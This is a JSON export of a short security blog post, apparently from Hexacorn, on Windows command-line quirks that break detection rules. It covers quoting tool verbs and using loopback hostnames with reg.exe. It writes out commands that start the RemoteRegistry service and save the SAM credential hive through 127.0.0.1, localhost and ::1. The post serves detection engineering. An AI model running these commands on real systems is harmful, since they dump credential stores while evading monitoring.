{"id":8979,"date":"2023-12-25T11:15:35","date_gmt":"2023-12-25T11:15:35","guid":{"rendered":"https:\/\/www.hexacorn.com\/blog\/?p=8979"},"modified":"2023-12-25T21:59:35","modified_gmt":"2023-12-25T21:59:35","slug":"2-less-known-secrets-of-windows-command-command-driven-line-tools","status":"publish","type":"post","link":"https:\/\/www.hexacorn.com\/blog\/2023\/12\/25\/2-less-known-secrets-of-windows-command-command-driven-line-tools\/","title":{"rendered":"2 less known secrets of Windows command command-driven line tools&#8230;"},"content":{"rendered":"\n<p>Many Windows tools support commands f.ex.:<\/p>\n\n\n\n<ul>\n<li><strong>reg.exe<\/strong> &#8211; QUERY, ADD, DELETE, COPY, SAVE, RESTORE, LOAD, UNLOAD, COMPARE, EXPORT, IMPORT, FLAGS<\/li>\n\n\n\n<li><strong>sc.exe<\/strong> &#8211; config, continue, control, create, delete, description, EnumDepend, failure, failureflag, GetDisplayName, GetKeyName, interrogate, managedaccount, pause, preferrednode, privs, qc, qdescription, qfailure, qfailureflag, qmanagedaccount, qpreferrednode, qprivs, qprotection, qsidtype, qtriggerinfo, query, queryex, quserservice, sdset, sdshow, showsid, sidtype, start, stop, triggerinfo<\/li>\n\n\n\n<li><strong>netsh.exe<\/strong> &#8211; ?, add, advfirewall, branchcache, bridge, delete, dhcpclient, dnsclient, dump, exec, firewall, help, http, interface, ipsec, lan, mbn, namespace, netio, p2p, ras, rpc, set, show, trace, wcn, wfp, winhttp, winsock, wlan<\/li>\n\n\n\n<li><strong>fsutil.exe<\/strong> &#8211; 8dot3name, behavior, dax, dirty, file, fsInfo, hardlink, objectID, quota, repair, reparsePoint, resource, sparse, storageReserve, tiering, transaction, usn, volume, wim<\/li>\n<\/ul>\n\n\n\n<p>We are very used to their invocations in a form of <em>tool command<\/em> but there is an alternative way to invoke them by using quotes around these commands f.ex.:<\/p>\n\n\n\n<ul>\n<li><em>reg.exe &#8220;query&#8221;<\/em> is identical with <em>reg.exe query<\/em><\/li>\n\n\n\n<li><em>sc.exe &#8220;start&#8221;<\/em> is identical with <em>sc start<\/em><\/li>\n\n\n\n<li>etc.<\/li>\n<\/ul>\n\n\n\n<p>This breaks many hard-coded detections.<\/p>\n\n\n\n<p>The second secret is the omnipresent support for everything &#8216;remote&#8217;, that is &#8211; operations that can be executed on other endpoints.<\/p>\n\n\n\n<p>As such, one can use computer names in many of these commands, f.ex. we can prefix registry keys for <em>reg.exe<\/em> command with host names. And this includes <em>localhost<\/em>, <em>127.0.0.1<\/em>, <em>::1<\/em> &#8211; yet notably, for these to work the RemoteRegistry service needs to be running on a local host. It&#8217;s actually very easy to do so:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sc config remoteregistry start= auto\nsc start remoteregistry<\/pre>\n\n\n\n<p>and then we can easily run one of these:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">reg save \\\\127.0.0.1\\hklm\\sam sam\nreg save \\\\localhost\\hklm\\sam sam\nreg save \\\\::1\\hklm\\sam sam\nreg \"save\" \\\\127.0.0.1\\hklm\\sam sam\nreg \"save\" \\\\localhost\\hklm\\sam sam\nreg \"save\" \\\\::1\\hklm\\sam sam<\/pre>\n\n\n\n<p>This will break many detections too.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Many Windows tools support commands f.ex.: We are very used to their invocations in a form of tool command but there is an alternative way to invoke them by using quotes around these commands f.ex.: This breaks many hard-coded detections. &hellip; <a href=\"https:\/\/www.hexacorn.com\/blog\/2023\/12\/25\/2-less-known-secrets-of-windows-command-command-driven-line-tools\/\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[79],"tags":[],"_links":{"self":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/8979"}],"collection":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/comments?post=8979"}],"version-history":[{"count":6,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/8979\/revisions"}],"predecessor-version":[{"id":8987,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/posts\/8979\/revisions\/8987"}],"wp:attachment":[{"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/media?parent=8979"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/categories?post=8979"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hexacorn.com\/blog\/wp-json\/wp\/v2\/tags?post=8979"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}